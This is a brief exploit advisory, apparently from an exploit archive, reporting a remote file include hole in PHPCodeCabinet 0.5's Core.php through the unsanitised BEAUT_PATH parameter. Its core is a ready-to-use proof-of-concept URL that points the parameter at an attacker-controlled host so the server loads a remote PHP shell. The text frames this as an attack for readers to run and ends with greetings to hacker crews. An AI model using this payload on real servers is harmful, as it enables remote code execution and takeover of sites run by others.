id: 658
date: 08/06/2006
title: PHPCodeCabinet <= 0.5 (Core.php) Remote File Include Vulnerability
author: Minion
cves: 

==================================================================
PHPCodeCabinet <= 0.5 (Core.php) Remote File Include Vulnerability
==================================================================


>From Minion:

PHPCodeCabinet (all versions) is vulnerable to a remote file include.

The vulnerable code is in /include/Beautifier/Core.php

an $BEAUT_PATH Was not properly scrubbed, so they got owned.

Proof of concept:

http://target/phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php

HFile.php would be your php shell.

Shouts to XoRcrew & Disruptiv.



#  0day.today [2023-03-24]  #